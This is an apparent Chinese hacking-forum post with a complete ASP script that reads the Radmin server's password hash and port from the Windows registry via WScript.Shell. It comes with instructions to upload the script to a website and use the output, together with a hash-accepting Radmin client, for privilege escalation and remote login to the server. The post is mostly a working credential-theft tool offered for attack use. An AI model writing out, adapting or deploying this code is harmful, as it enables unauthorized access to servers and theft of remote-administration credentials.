读取radmin影子版HASH密码的asp代码
把以下这段代码保存在为radmin.asp文件,然后上传到网站空间,在访问http://你的网站/radmin.asp,将返回如下结果The Result of Radmin Hash
Parameter:a5a4facdf9814d43a1dc6648e315d3d0
Port:4489
就表示成功获取radmin HASH成功和端口号。。。,这个前提是要网站服务器空间安装有radmin软件,适合用于网站服务器提权使用。。。虽然无法获取实际的密码,但是如果配合radmin_hash版本,完全可以进行远程连接到服务器中去的。说句题外话,radmin远程控制确实不错的,适用起来也方便稳定,有点缺憾的是只能进行主动连接,没有反弹连接的功能,不过这样相对来说也安全性更加高吧?要不就会像灰鸽子一样,被杀毒软件杀的体无完肤了。。。
<%
'================================Main=================
Set WSH= Server.CreateObject("WSCRIPT.SHELL")
RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"
Parameter="Parameter"
Port = "Port"
ParameterArray=WSH.REGREAD(RadminPath & Parameter )
Response.write "The Result of Radmin Hash"
Response.write "<br><br>"
Response.write Parameter&":"
'=========== ReadPassWord =========
If IsArray(ParameterArray) Then
For i = 0 To UBound(ParameterArray)
If Len (hex(ParameterArray(i)))=1 Then
strObj = strObj & "0" & CStr(Hex(ParameterArray(i)))
Else
strObj = strObj & Hex(ParameterArray(i))
End If
Next
response.write Lcase(strobj)
Else
response.write "Error! Can't Read!"
End If
Response.write "<br><br>"
'=========== ReadPort =========
PortArray=WSH.REGREAD(RadminPath & Port )
If IsArray(PortArray) Then
Response.write Port &":"
Response.write hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0))))
Else
Response.write "Error! Can't Read!"
End If
'=======================================hex TO int===================================
Function hextointer(strin)
Dim i, j, k, result
result = 0
For i = 1 To Len(strin)
If Mid(strin, i, 1) = "f" or Mid(strin, i, 1) ="F" Then
j = 15
End If
If Mid(strin, i, 1) = "e" or Mid(strin, i, 1) = "E" Then
j = 14
End If
If Mid(strin, i, 1) = "d" or Mid(strin, i, 1) = "D" Then
j = 13
End If
If Mid(strin, i, 1) = "c" or Mid(strin, i, 1) = "C" Then
j = 12
End If
If Mid(strin, i, 1) = "b" or Mid(strin, i, 1) = "B" Then
j = 11
End If
If Mid(strin, i, 1) = "a" or Mid(strin, i, 1) = "A" Then
j = 10
End If
If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then
j = CInt(Mid(strin, i, 1))
End If
For k = 1 To Len(strin) - i
j = j * 16
Next
result = result + j
Next
hextointer = result
End Function
'====================================== End ======================================
%>
页:
[1]